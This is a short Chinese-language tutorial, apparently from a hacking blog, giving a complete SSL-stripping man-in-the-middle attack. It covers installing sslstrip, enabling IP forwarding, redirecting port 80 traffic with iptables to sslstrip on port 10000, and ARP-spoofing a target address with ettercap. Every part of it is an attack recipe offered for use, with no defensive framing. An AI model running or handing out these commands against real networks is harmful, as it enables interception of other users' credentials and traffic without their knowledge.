需要工具:
1. sslstrip
下载及安装方法 : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
sudo python ./setup.py install
2.arpspoof bt5自带2.4版本
3.ettercap
步骤:
1.开启BT4里面ip转发功能
echo 1 > /proc/sys/net/ipv4/ip_forward
2.通过iptables把所有http数据导入到10000端口,我们利用sslstrip监听10000端口,并得到我们想要的数据。
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
3.然后我们使用sslstrip监听10000端口
sslstrip -l 10000
4.利用ettercap进行指定ip的欺骗
ettercap -T -q -M arp:remote /192.168.1.42/ //